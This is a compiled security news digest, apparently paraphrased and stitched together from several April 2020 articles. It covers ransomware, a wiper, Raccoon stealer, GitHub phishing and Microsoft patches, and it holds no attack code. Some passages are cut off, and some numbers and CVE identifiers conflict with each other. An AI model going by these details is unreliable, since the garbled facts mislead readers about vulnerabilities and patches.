Microsoft releases guidance on blocking ransomware attacks
Microsoft has issued a warning about active human-operated ransomware campaigns aimed at healthcare organizations and critical services To prevent new breaches, the company emphasizes the importance of patching vulnerable internet-facing systems.
Many such attacks start with the human operators first exploiting vulnerabilities found in internet-facing network devices or by brute-forcing RDP servers and then deploying the ransomware payloads.
Pulse VPN devices have previously been exploited by cybercriminals, notably being linked to the Travelex ransomware attack orchestrated by the Sodinokibi (REvil) group.
Other ransomware gangs such as DoppelPaymer and Ragnarok Ransomware also exploited the Citrix ADC (NetScaler) CVE-2019-1978 vulnerability to get a foothold on the edge of their victims' networks
Microsoft explains that before deploying ransomware and encrypting systems, attackers typically conduct a reconnaissance phase During this stage, they steal sensitive data for potential blackmail, gather credentials, and navigate laterally within the victims' networks.
To safeguard against ransomware attacks, Microsoft recommends that potential victims take proactive measures to mitigate vulnerabilities that threat actors typically exploit.
Reduce the risk of being a ransomware victim
"Applying security patches for internet-facing systems is critical in preventing these attacks," the Microsoft Threat Protection Intelligence Team explains
From data acquired by Microsoft following recent ransomware attacks, the malicious actors commonly take advantage of these security gaps:
• Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)
• Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords
• Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
• Citrix Application Delivery Controller (ADC) systems affected by CVE-2019-19781
• Pulse Secure VPN systems affected by CVE-2019-11510
Despite no recent attacks targeting the CVE-2019-0604 (Microsoft SharePoint), CVE-2020-0688 (Microsoft Exchange), and CVE-2020-10189 (Zoho ManageEngine) vulnerabilities, Microsoft warns that these vulnerabilities may eventually be exploited to infiltrate victims' networks Therefore, it is crucial to review and apply patches for these vulnerabilities to enhance security.
Detecting and responding to ongoing attacks
Organizations must actively monitor for indicators of ransomware attacks in their environments, including tools that facilitate these attacks by mimicking legitimate red team activities, such as Malicious PowerShell and Cobalt Strike Additionally, they should be vigilant for signs of credential theft and any tampering with security logs.
Once any such signs are detected, orgs' security operations teams should immediately take the following actions to assess the security impact and prevent the payloads from being deployed:
− Investigate affected endpoints and credentials
− Inspect and rebuild devices with related malware infections
To defend against ransomware attacks, it is crucial to identify and address any internet-facing vulnerabilities by locating perimeter systems that attackers might exploit to gain access to networks.
Systems that ransomware attackers might try to abuse during their attacks:
− RDP or Virtual Desktop endpoints without MFA
− Citrix ADC systems affected by CVE-2019-19781
− Pulse Secure VPN systems affected by CVE-2019-11510
− Microsoft SharePoint servers affected by CVE-2019-0604
− Microsoft Exchange servers affected by CVE-2020-0688
− Zoho ManageEngine systems affected by CVE-2020-10189
Ransomware gangs maintain access to victims' networks for months
In early April 2020, numerous ransomware groups that had been steadily infiltrating and establishing a foothold in targeted networks for months launched a series of ransomware attacks, according to Microsoft.
Recent ransomware attacks have targeted a wide range of sectors, including aid organizations, medical billing companies, manufacturing, transportation, government institutions, and educational software providers This highlights the alarming disregard these ransomware groups have for essential services, even amidst a global crisis.
All government and private organizations, not just healthcare and critical services, are at risk of ransomware attacks Therefore, it is essential for these entities to implement proactive measures to reduce vulnerabilities and ensure they are prepared to respond effectively at any moment.
According to Microsoft's threat intelligence data, the infiltration of ransomware into organizations' networks began in early 2020, with attackers strategically delaying the deployment of ransomware payloads to maximize their financial gain.
Attack techniques used by ransomware gangs (Microsoft)
Microsoft notes that unlike quicker ransomware attacks typically delivered through email, which often see deployment within an hour, the attacks observed in April resemble the Doppelpaymer ransomware campaigns from 2019 In these cases, attackers infiltrated networks months ahead of launching their ransomware.
"They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware
"On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt
Many of these groups, although only a handful have gained fame for selling data, were still seen accessing and extracting information during their attacks, even if they have not yet marketed or sold this data.
In early March, Microsoft revealed insights into the entry points and post-exploitation methods utilized by the operators of DoppelPaymer, Dharma, and Ryuk ransomware The findings highlighted a significant overlap in the security misconfigurations exploited by these threat actors during their damaging ransom attacks.
Microsoft is also alerting hospitals regarding vulnerable public-facing VPN devices and gateways located on their networks starting with April 1
During the RSA security conference, the FBI revealed that victims have paid over $140 million to ransomware operators in the past six years, highlighting the significant impact of ransomware attacks This analysis was based on collected cryptocurrency wallets and ransom notes, showcasing the financial toll on those affected.
Source: https://www.bleepingcomputer.com/news/security/microsoft-releases-guidance- on-blocking-ransomware-attacks/
Wiper Malware Called “Coronavirus” Spreads Among Windows Victims 9 3 How Relevance Scoring Can Make Your Threat Intell More Actionable 11 4 Emerging MakeFrame Skimmer from Magecart Sets Sights on SMBs 13 5 44M Digital Wallet Items Exposed in Key Ring Cloud Misconfig
Like NotPetya, it overwrites the master boot record to render computers "trashed."
A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR) It takes its cue from the COVID-19 pandemic, calling itself simply “Coronavirus.”
Overwriting the MBR is the same trick that the infamous NotPetya wiper malware used in
2017 in a campaign that caused widespread, global financial damage
A new malware strain identified by SonicWall Capture Labs is a destructive trojan known as the Coronavirus trojan, which presents victims with a gray screen and a blinking cursor displaying the alarming message, “Your computer has been trashed.” While it is less destructive than other wiper malware, researchers indicate that there is currently no clear solution for this threat.
The COVID-19 pandemic has created new opportunities for cybercriminals, who exploit global fears through phishing attacks that promise financial relief These malicious actors have even named their malware after the coronavirus, using it as a central theme to deceive victims.
As far as that infection routine, the malware can be delivered in any of the usual ways – as a malicious email attachment, file download, fake application and so on
Upon execution, the malware installs several helper files in a temporary folder, adhering to its pandemic theme An installer named “coronavirus.bat” initiates the attack by creating a hidden folder titled “COVID-19” on the victim's machine, where the previously dropped files are relocated to remain undetected until the malware's objectives are fulfilled.
The installer not only disables Windows Task Manager and User Access Control (UAC) to obscure its activities, but it also alters the victim's wallpaper and prevents any modifications to it afterward.
It also adds entries in registry for persistence, and then sets about rebooting to finish the installation
The process run.exe creates a batch file named run.bat to ensure the registry modifications done by “coronavirus.bat” are kept intact during the reboot process, according to SonicWall
After a reboot, the malware launches two binaries, including “mainWindow.exe,” which presents a window featuring an image of the coronavirus and two buttons The window warns the victim that “coronavirus has infected your PC!”
The interface features two buttons labeled "Remove virus" and "Help." Clicking the "Remove virus" button has no effect, while the "Help" button triggers a pop-up message advising victims not to waste their time, stating that "you can't terminate this process!"
The other binary carries out the meat of the attack: It’s responsible for overwriting the MBR
Researchers state that the original Master Boot Record (MBR) is backed up in the first sector before being replaced with new code.
Once the overwrite is complete, the victim’s display is changed to a simple grey screen delivering the bad news:
SonicWall informed Threatpost that it successfully analyzed the sample after it was uploaded to VirusTotal, noting that there have been limited occurrences of this issue so far.
“Coronavirus” observed in the wild, and little in known in terms of targeting or what the spreading mechanisms are for the mysterious new malware
The team also told Threatpost that the good news is that this is not as dangerous as other wiper strains
Even if the Master Boot Record (MBR) is not restored, data can still be accessed by mounting the drive While it is possible to restore the MBR, doing so is complex and requires advanced technical expertise.
Source: https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/
3 How Relevance Scoring Can Make Your Threat
As businesses expand globally, the increasing volume and complexity of cyberattacks pose significant challenges for security analysts Protecting organizations with multiple international offices, such as those in London, Hong Kong, and Santa Cruz, requires navigating intricate security landscapes Furthermore, the rapid rise in companies experiencing data breaches, destructive malware, and ransomware highlights the urgent need for robust cybersecurity measures.
High-quality threat intelligence can offer immediate network protection, provide visibility to known threats and significantly reduce the time required for situational investigation or incident response
Security analysts require automated tools with intelligent rules to efficiently find, organize, and filter relevant information for incident response and threat research Within the security operations center (SOC), these professionals leverage threat intelligence to differentiate between critical signals and irrelevant noise, swiftly identify genuine issues and their solutions, and prioritize remediation efforts effectively.
Speed is imperative More specifically, time to decision is everything
In order to shorten their time to decision, security analysts need to quickly answer key questions, such as:
– What is its potential impact on my organization?
– How do I prioritize it against my backlog?
– What evidence do I have to support my position?
Threat intelligence plays a crucial role in addressing security concerns by providing essential context to ongoing investigations By utilizing indicator-based threat intelligence, organizations can validate internal observations, while vulnerability-based threat intelligence sheds light on potential risks and their implications for the organization.
However, a key problem for analysts, assuming they have quality threat intelligence, is relevance How do you know if that threat intelligence is relevant to this situation?
How Relevance Scoring Can Help
Relevance scoring is a method that aligns the characteristics of security analysts’ threat intelligence with their organization's attributes, including industry and location By pinpointing indicators linked to these specific properties, analysts can prioritize those that are most relevant to their organization when analyzing traffic Implementing automated tools that utilize relevance scoring could enhance the insights provided, making them more pertinent and actionable for analysts.
Implementing user-specific relevance scoring techniques enhances security tools by delivering timely and contextualized data tailored to an organization's unique industry and region By sharing sightings with threat intelligence vendors and other organizations, entities can enrich their threat intelligence, ultimately benefiting the broader community they belong to.
Quality threat intelligence combined with local relevance scoring can go directly to the bottom line in the form of faster incident investigation, determination, prioritization and remediation
Learn how the X-Force Threat Score brings relevance scoring to IBM Security Threat Intelligence Insights
The post How Relevance Scoring Can Make Your Threat Intelligence More Actionable appeared first on Security Intelligence
Source: http://feedproxy.google.com/~r/SecurityIntelligence/~3/NhPGN6rYv5k/
4 Emerging MakeFrame Skimmer from Magecart
Attacks using a brand-new card-harvesting code is targeting small- to medium-sized businesses, claiming 19 sites so far
Researchers have identified a new skimmer utilized by the Magecart Group, which has been extracting payment card information from 19 different websites, primarily targeting small- and medium-sized businesses (SMBs), over the past few months.
Microsoft: No surge in malicious attacks, just more COVID-19 lures
Microsoft reports that while the overall volume of malicious attacks has not risen, threat actors have adapted existing infrastructure from prior attacks and restructured their campaigns to take advantage of the fears related to the COVID-19 pandemic.
According to Rob Lefferts, Corporate Vice President of Microsoft 365 Security, attackers are not gaining new resources but are instead repurposing their existing tools, such as ransomware and phishing, to exploit COVID-19-related keywords that entice users to click.
Clicking on malicious links can lead to unauthorized access to our inboxes, theft of credentials, and the distribution of more harmful links to colleagues through collaboration tools Cybercriminals often remain undetected while gathering sensitive information that could yield significant financial gains.
The United States' Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) have also issued a joint alert today about ongoing COVID-19 exploitation
No surge attacks, just an influx of rethemed attack campaigns
According to Lefferts, Microsoft's data indicates that cyber attackers have merely rebranded their prior campaigns, utilizing COVID-19 themes to exploit the heightened stress experienced by potential victims during the SARS-CoV-2 pandemic.
Malicious actors are adapting their tactics by changing their bait rather than increasing the volume of attacks, contrary to the widespread belief that there would be a surge in cyber threats following the rise of COVID-19 themed attacks since the outbreak began.
"Our intelligence shows that these attacks are settling into a rhythm that is the normal ebb and flow of the threat environment," Lefferts added
Malware campaigns adapted to the pandemic (Microsoft)
According to Microsoft's telemetry data, every country has experienced some form of pandemic-themed cyberattack, with the United States, China, and Russia being the primary targets of these threats.
Since the onset of these attacks, Microsoft has identified 76 different threat variants leveraging COVID-19 themed tactics, with the Trickbot and Emotet malware families being particularly active in exploiting the pandemic.
According to Microsoft, approximately 60,000 out of millions of targeted messages include COVID-19 related malicious attachments or URLs, based on data gathered from thousands of email phishing campaigns each week.
"In a single day, SmartScreen sees and processes more than 18,000 malicious COVID-19- themed URLs and IP addresses."
Impact of COVID-109 themed attacks around the world (Microsoft)
Despite the seemingly large number of threats, it represents less than two percent of the total volume we monitor and protect against daily This indicates that while the overall threat volume remains stable, attackers are adapting their strategies to exploit fear.
Nation-state actors using COVID-19 lures in attacks targeting healthcare have also been spotted by Microsoft security researchers since the start of the pandemic
Microsoft is sending notifications to dozens of hospitals affected by such attacks and about vulnerable exposed VPN devices and gateways on their networks
Redmond shares news and guidance related to the pandemic on the company's COVID-
CISA and NCSC joint alert on COVID-19 exploitation
Cybercriminals and advanced persistent threat (APT) groups are exploiting the COVID-19 pandemic to launch attacks on individuals, small and medium enterprises, government agencies, and large organizations, as reported by CISA and NCSC.
Furthermore, "both CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors," the alert says
"At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations."
Threats observed so far by CISA, NCSC, and the security industry at large include:
− Phishing, using the subject of coronavirus or COVID-19 as a lure,
− Malware distribution, using coronavirus- or COVID-19- themed lures,
− Registration of new domain names containing wording related to coronavirus or COVID-19, and
− Attacks against newly—and often rapidly—deployed remote access and teleworking infrastructure
CISA and NCSC in collaboration with industry partners and law enforcement agencies also provide non-exhaustive lists of COVID-19-related IOCs in CSV and STIX formats
Guidance to mitigate the risk posed by COVID-19 themed attack campaigns to organizations and individuals is available via the following CISA and NCSC resources:
− CISA guidance for defending against COVID-19 cyber scams
− CISA Insights: Risk Management for Novel Coronavirus (COVID-19), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19
− CISA Alert: Enterprise VPN Security
− CISA webpage providing a repository of the agency’s COVID-19 guidance
− NCSC guidance to help spot, understand, and deal with suspicious messages and emails
− NCSC phishing guidance for organizations and cyber security professionals
− NCSC guidance on mitigating malware and ransomware attacks
− NCSC guidance on home working
− NCSC guidance on end user device security
Source: https://www.bleepingcomputer.com/news/security/microsoft-no-surge-in- malicious-attacks-just-more-covid-19-lures/
Copycat Site Serves Up Raccoon Stealer
Visitors to the fake site expecting antivirus offerings will instead encounter the Fallout exploit kit and a possible malware infection
Someone is targeting web denizens with a malicious, copycat Malwarebytes website, which serves up the Raccoon information stealer malware to unsuspecting visitors
In late March, attackers established the domain "malwarebytes-free[.]com" through a Russian domain registrar, as reported by Malwarebytes The security firm indicated to Threatpost that they do not anticipate any communication from either the registrar or the hosting provider, highlighting that the website remains operational.
A recent security firm report reveals that our original site’s content has been stolen and modified, incorporating a JavaScript snippet that detects the user's browser If the browser is Internet Explorer, users are redirected to a malicious URL linked to the Fallout exploit kit.
Researchers have discovered that a counterfeit Malwarebytes website is being utilized in a malvertising campaign through the PopCash ad network This campaign involves fake Malwarebytes ads displayed on adult websites, which redirect users to a harmful site The researchers have reported these malicious advertisements to PopCash for further action.
The Fallout exploit kit is employed to infect vulnerable machines with Raccoon data-harvesting malware, whether visitors arrive through organic search or advertisements Raccoon meticulously searches for sensitive information, including credit card details, cryptocurrency wallets, passwords, emails, cookies, and system data from popular browsers, such as saved credit card information, URLs, usernames, and passwords, before transmitting this data back to its operator.
The fake site Click to enlarge
Raccoon is an emerging malware actively developed by its creators, as highlighted in a recent Cofense analysis This malware is marketed as a malware-as-a-service on underground forums in both Russian and English, and it comes with 24/7 customer support for users.
First identified in April 2019, the Raccoon malware has been utilized in various campaigns, including a notable instance in November when Cofense reported its ability to bypass anti-spam defenses from Microsoft and Symantec This was achieved by employing IMG files that were hosted on a Dropbox account controlled by hackers.
According to additional research, the malware had infected hundreds of thousands of Windows systems as of last October
Malwarebytes analysts discovered that the operators behind the fake-site campaign attempted similar strategies with other security companies, particularly Cloudflare This effort involved a copycat site that was spread through malvertising techniques.
Researchers at Malwarebytes have identified a potential link between a current threat actor and ongoing adult malvertising campaigns utilizing the Fallout exploit kit While the attacks are not particularly sophisticated, they have managed to spread across a wide range of ad platforms Unlike typical malvertising incidents that usually involve one or two ad networks, this threat actor has diversified their traffic sources significantly.
Malwarebytes researchers believe that the targeting of security firms could be a deliberate tactic meant as payback for revealing malvertising activity
Malwarebytes reports that the remaining malvertising campaigns primarily target second- and third-tier adult websites, often leading to the Fallout or RIG exploit kits, as most threat actors have shifted to different distribution methods They suggest that the recent faux Malwarebytes malvertising campaign may be retaliation for their ongoing efforts to collaborate with ad networks to track, report, and eliminate such attacks.
Users can protect themselves by keeping their systems fully patched, and by double- checking the identity of any website before clicking on an ad or a link
Source: https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/
Travelex Pays $2.3M in Bitcoin to Hackers
The payout stems from a system-wide attack that knocked global networks offline on New Year’s Eve and reflects a shift in thinking about ransom payouts
Travelex paid $2.3 million in Bitcoin to hackers following a malware attack that disrupted its global network and significantly impacted its operations in January.
According to a report by the Wall Street Journal, the decision to pay ransom to threat actors may appear counterintuitive, as experts have traditionally advised companies against such actions during cyber incidents.
The mindset surrounding cyberattacks is evolving, as businesses increasingly recognize that paying ransoms to hackers can be less financially damaging than remaining locked out of their systems due to sophisticated attacks.
Travelex revealed that experts recommended the company pay the perpetrators behind the New Year’s Eve cyberattack, which led to the shutdown of its online services and mobile app This incident forced retail locations to operate manually, leaving many customers without access to travel money and disrupting global banking partners' ability to buy or sell foreign currency.
Travelex, a prominent foreign-exchange service provider operating in over 70 countries with more than 1,200 retail branches, faced a significant cyberattack that led to the shutdown of its websites in at least 20 countries This disruption severely impacted Travelex's business operations and created substantial issues for its banking partners, including Barclays, First Direct, HSBC, Sainsbury’s Bank, Tesco, and Virgin Money.
Travelex has consistently updated its partners and regulators regarding the situation following a ransomware attack attributed to the Sodinokibi strain The attackers demanded a six-figure ransom for the decryption key and directed Travelex to a payment website located in Colorado, as disclosed by the company approximately one week after the incident.
A recent report reveals that most companies affected by ransomware attacks, like Travelex, often choose to pay the hackers, despite such payouts typically remaining undisclosed This decision is driven by the desire to avoid the significant financial and operational repercussions that can arise from having their networks compromised.
According to the "2020 Cyberthreat Defense Report" by PerimeterX, 62% of the 1,200 IT security professionals surveyed reported that their networks had fallen victim to ransomware attacks, with many ultimately paying the ransom to regain control of their systems.
A Forrester Research report from last year indicated that paying a ransom might be considered a viable business strategy, complementing other recovery efforts This is particularly relevant because, even with optimal backups, achieving complete recovery of data and systems is often unattainable.
Forrester emphasizes that while it does not endorse paying ransoms, it acknowledges this option as a legitimate recovery strategy that should be considered alongside other recovery efforts This approach aims to help organizations make informed decisions regarding their recovery paths, according to Forrester Principal Analyst Josh Zelonis.
Organizations, particularly local governments, are increasingly recognizing the importance of cybersecurity, especially in the absence of robust technical support for system recovery Researchers indicate that these entities face greater financial risks if they choose not to pay ransoms, as the costs associated with system recovery can far exceed the ransom amount.
In June, a Florida city controversially paid $600,000 to hackers to recover data following a ransomware attack, a decision met with criticism from security experts In contrast, the city of Baltimore faced a significant ransomware attack last year, resulting in an estimated financial impact of $18.2 million, despite the hacker's demand of only $76,000 in bitcoin Security expert Zelonis described the choice not to pay in Baltimore as "shortsighted," highlighting the potential consequences of such attacks.
As the financial implications of refusing to pay ransom surpass the costs of compliance, high-profile ransomware payouts, similar to Travelex's case, are expected to become increasingly common in the future.
Source: https://threatpost.com/travelex-pays-2-3m-in-bitcoin-to-hackers-who-hijacked- network-in-january/154666/
Microsoft April 2020 Patch Tuesday fixes 4 zero-days, 15 critical flaws 33 12 GitHub accounts stolen in ongoing phishing attacks
With the release of the April 2020 security updates, Microsoft has released fixes for 113 vulnerabilities in Microsoft products Of these vulnerabilities, 15 are classified as Critical,
93 as Important, 3 as Moderate, and 2 as Low
Of particular interest, Microsoft patched three zero-day vulnerabilities, with two of them being seen actively exploited in attacks
Users should install these security updates as soon as possible to protect Windows from known security risks
Zero-day vulnerabilities fixed in April 2020
Microsoft has stated that two zero-day vulnerabilities have been publicly disclosed and two have been known to be exploited in the wild
The publicly released vulnerabilities are:
− CVE-2020-0935 - OneDrive for Windows Elevation of Privilege Vulnerability
− CVE-2020-1020 - Adobe Font Manager Library Remote Code Execution Vulnerability The publicly exploited vulnerabilities are:
− CVE-2020-0938 - Adobe Font Manager Library Remote Code Execution Vulnerability
− CVE-2020-1020 - Adobe Font Manager Library Remote Code Execution Vulnerability
Patch released for Adobe Font Manager zero-day vulnerabilities
The two zero-day remote code execution vulnerabilities in the Windows Adobe Font Manager Library were previously announced by Microsoft as they were seen being exploited in limited attacks
These vulnerabilities are known as the CVE-2020-0938 and CVE-2020-1020 "Adobe Font Manager Library Remote Code Execution Vulnerability" and has the following description:
A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format
An attacker exploiting this vulnerability could execute code remotely on all systems except Windows 10, where the code would run in a restricted AppContainer sandbox This limitation allows the attacker to install programs, manipulate data, or create new accounts with full user rights, albeit with limited privileges and capabilities.
There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane
Previously, various workarounds were released, such as disabling preview panes, various services, and registry modifications to reduce the security risks or block attacks
With this security update installed, these workarounds are no longer necessary, and users who have applied them should undo them as they are no longer needed
The April 2020 Patch Tuesday Security Updates
In the April 2020 Patch Tuesday updates, a comprehensive list of resolved vulnerabilities and released advisories has been provided For detailed descriptions of each vulnerability and the systems impacted, please refer to the complete report available here.
Update 4/14/20: Microsoft made a correction to CVE-2020-0968 and changed it to not being exploited So only three zero-days this Patch Tuesday
Source: https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2020-patch- tuesday-fixes-4-zero-days-15-critical-flaws/
12 GitHub accounts stolen in ongoing phishing attacks
GitHub users are currently being targeted by a phishing campaign specifically designed to collect and steal their credentials via landing pages mimicking GitHub's login page
Besides taking over their accounts, the attackers are also immediately downloading the contents of private repositories, including but not limited to "those owned by organization accounts and other collaborators."
According to GitHub's Security Incident Response Team (SIRT), if an attacker gains access to a user's GitHub account credentials, they can swiftly generate personal access tokens or authorize OAuth applications to maintain access, even if the user subsequently changes their password.
GitHub's SIRT published information on this ongoing phishing campaign dubbed Sawfish to increase awareness and allow users that might be targeted to protect their accounts and repositories
Phishing attack targets active GitHub accounts
Phishing emails employ various tactics to deceive recipients into clicking on malicious links, often claiming unauthorized activity or changes to account settings or repositories.
Users who are deceived into checking their account activity are redirected to a fraudulent GitHub login page, where their credentials are collected and sent to servers controlled by attackers.
Phishing landing pages can capture victims' 2FA codes in real-time when they use time-based one-time password (TOTP) mobile apps This enables attackers to bypass accounts secured with TOTP-based two-factor authentication.
However, "[a]ccounts protected by hardware security keys are not vulnerable to this attack," the Git repository hosting service's SIRT explains
This ongoing phishing campaign targets currently-active GitHub users working for tech companies from multiple countries using email addresses obtained from public commits
The phishing emails are delivered from legitimate domains, either using previously- compromised email servers or with the help of stolen API credentials for legitimate bulk email service providers
Attackers in this campaign utilize URL-shortening services to conceal the URLs of their landing pages, often chaining multiple services together for greater obfuscation.
To further help them make the malicious links used in the attack look less suspicious, the threat actors also use PHP-based redirectors on compromised sites
How to defend against these phishing attacks
Users that haven't configured two-factor authentication for their GitHub accounts using a security key are advised by the Microsoft-owned company to:
− Reset their two-factor recovery codes immediately
− Review their personal access tokens
− Take additional steps to review and secure their accounts
To enhance security against phishing attacks that target two-factor codes, GitHub recommends the use of hardware security keys or WebAuthn two-factor authentication Additionally, utilizing a browser-integrated password manager can further protect your accounts.
"These provide a degree of phishing protection by auto-filling or otherwise recognizing only a legitimate domain for which you have previously saved a password
"If your password manager doesn’t recognize the website you’re visiting, it might be a phishing site."
One year ago, attackers were using GitHub's platform to host their phishing kits by abusing the service's free repositories to deliver them via github.io pages
Source: https://www.bleepingcomputer.com/news/security/github-accounts-stolen-in- ongoing-phishing-attacks/
Business Flexibility Through Digital Trust and Risk Management
In the 1970s, professional football featured formidable defenses that earned unique nicknames, such as the Pittsburgh Steelers' "Steel Curtain," the Miami Dolphins' "No-Name Defense," and the Dallas Cowboys' "Doomsday Defense." The Cowboys' defensive strategy was rooted in the innovative flex defense, introduced by coach Tom Landry in 1964 and refined throughout the following decade.
The flex defense used gap assignments to define player’s roles and relied on reading
Players relied on key indicators to anticipate the offense's actions, fostering trust among teammates to maintain their designated gaps Each player developed the ability to read and react to these indicators, enabling them to predict upcoming plays They were also trained to adapt their strategies in real-time as the play evolved.
The Role of Security in Business Flexibility
Flexibility is a vital competency in business, akin to business continuity planning Information security teams can enhance this flexibility by establishing a reliable foundation that fosters goodwill and builds confidence By consistently refining their risk management skills, businesses can better adapt to evolving customer needs while maintaining security, allowing for experimentation and growth.
The rise of data breaches since the beginning of the last decade has significantly impacted the cybersecurity community's confidence in its ability to detect and prevent data loss, while also eroding consumers' trust in the privacy of their personal information However, trust remains crucial for consumers, as it can lead to highly positive outcomes for businesses that prioritize data security.
To enhance goodwill through trust, companies must embrace a digital trust mindset, prioritize system hygiene, and invest in a robust security function This approach not only ensures the protection of products and services that customers depend on but also provides the necessary flexibility for business operations.
Engender Digital Trust in Your Organization
Digital trust is the confidence in an organization's ability to protect data and ensure individual privacy By aligning privacy controls with the customer data experience, businesses can enhance their system hygiene, fostering customer goodwill and peace of mind This instills confidence in customers that their data is secure and their privacy is safeguarded, while organizations can trust their capabilities in data protection and reducing the impact of cyber threats.
To ensure robust system hygiene, it is essential to focus on identity management, authentication, and detailed privilege settings for both employees and customers This approach enhances confidence in network activity and simplifies compliance with privacy regulations such as the California Consumer Privacy Act (CCPA) and the General Data Protection Regulation (GDPR).
To build trust through robust data security, a flexible security organization must prioritize continuous skills development within its high-caliber team Similar to Dallas's strategy of drafting and training exceptional athletes, the security function should emphasize learning agility, ensuring team members are always in a state of learning Although maintaining this constant learning environment demands significant time investment, the outcome—a blend of reliable systems and expertly refined security skills—justifies the effort.
Work Backward to Manage Cyber Risk
In the context of security, the shortage of personnel often hinders our ability to fulfill all security needs, which can limit the flexibility we offer to our internal customers This challenge underscores the importance of fostering diverse perspectives in security strategies.
We can’t just embed personnel; we need to teach security thinking
An effective risk management technique involves visualizing the ideal state of security for a product, service, function, or process This ideal state represents full implementation of security measures, effectively mitigating risks across various scenarios By teaching this concept through examples, it becomes a straightforward approach that can be applied in diverse situations.
To achieve our ideal state, we must focus on designing and implementing compensating and detective controls Depending on our team's expertise, we can frame our discussions around how to safeguard the process during this transition Additionally, instead of solely addressing detective controls, we should encourage the team to explore methods for identifying potential issues that require our attention.
This technique promotes effective brainstorming and collaboration by envisioning an ideal future while remaining grounded in the present Its versatility allows for application in various settings, making it adaptable to evolving circumstances.
Foster Innovation and Adaptability Throughout Your Business
Establishing digital trust is an investment in goodwill, as a well-trained security team transforms simple risk management techniques into flexible business solutions This approach fosters innovation, enabling us to provide customers with the products they truly need and desire.
The flex defense has proven to be highly effective, particularly for the New England Patriots, a team that has dominated the 21st century and is regarded as one of the last true American sports dynasties If the Patriots can secure one more winning season, they will further solidify their legacy before potentially facing a tie or losing season.
The flex defense has proven to be highly effective, allowing defenses to dominate the game of football, leading to the need for changes in playbooks to enhance offensive strategies This adaptability is crucial for success in the evolving landscape of the sport.
Microsoft Issues Out-Of-Band Security Update For Office, Paint 3D
Microsoft has issued an urgent security update for Microsoft Office, Office 365 ProPlus, and Paint 3D to address several Autodesk vulnerabilities These vulnerabilities pose a risk of remote code execution if exploited, highlighting the importance of updating these applications promptly.
Autodesk's FBX library, which is widely used for 3D model support and integrated into specific Microsoft applications, has several vulnerabilities classified as "important" in severity, linked to six distinct CVEs.
“Remote code execution vulnerabilities exist in Microsoft products that utilize the FBX library when processing specially crafted 3D content,” according to Microsoft’s Tuesday advisory
Affected products include Microsoft Office 365 ProPlus, which offers premium applications such as Word, Excel, PowerPoint, Outlook, and Teams for both 32- and 64-bit systems Additionally, Paint 3D, formerly known as Microsoft Paint, is included among the impacted applications Microsoft Office 2016 and Office 2019, both available in Click-to-Run for 32- and 64-bit editions, are also affected.
The Autodesk vulnerabilities originate from the FBX software development kit (SDK) and include a critical buffer overflow flaw (CVE-2020-7080) that may permit attackers to execute arbitrary code Additionally, a type confusion vulnerability (CVE-2020-7081) could enable unauthorized access to out-of-bounds memory, potentially leading to arbitrary code execution or denial-of-service (DoS) attacks Furthermore, a use-after-free issue (CVE-2020-7082) allows applications to reference memory locations controlled by unauthorized parties, facilitating arbitrary code execution on the system.
The application is susceptible to several vulnerabilities, including an integer overflow issue (CVE-2020-7083) that can be exploited to crash the application, resulting in a denial-of-service (DoS) condition Additionally, a Null Pointer Dereference vulnerability (CVE-2020-7084) poses a risk for potential DoS attacks.
A critical heap overflow vulnerability (CVE-2020-7085) in susceptible FBX parsers can be exploited to achieve restricted code execution by modifying specific values within an FBX file, leading to the execution of arbitrary code on the affected system.
The latter flaw was reported by F-Secure security researcher Max Van Amerongen, who demonstrated his proof-of-concept (PoC) exploit for the flaw on Twitter
In a real life scenario, an attacker would need to send a specially crafted file (containing 3D content) to a user and convince them to open it in order to exploit the flaws
An attacker who successfully exploited these vulnerabilities could gain the same user rights as the local user, according to Microsoft
“Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,” it said
The security updates addresses these vulnerabilities by correcting the way 3D content is handled by Microsoft software
In April 2020, Microsoft released out-of-band patches, separate from its usual Patch Tuesday updates, addressing a total of 113 vulnerabilities Among these, 19 were classified as critical, 94 as important, and three were actively being exploited in the wild.
Source: https://threatpost.com/microsoft-issues-out-of-band-security-update-for-office-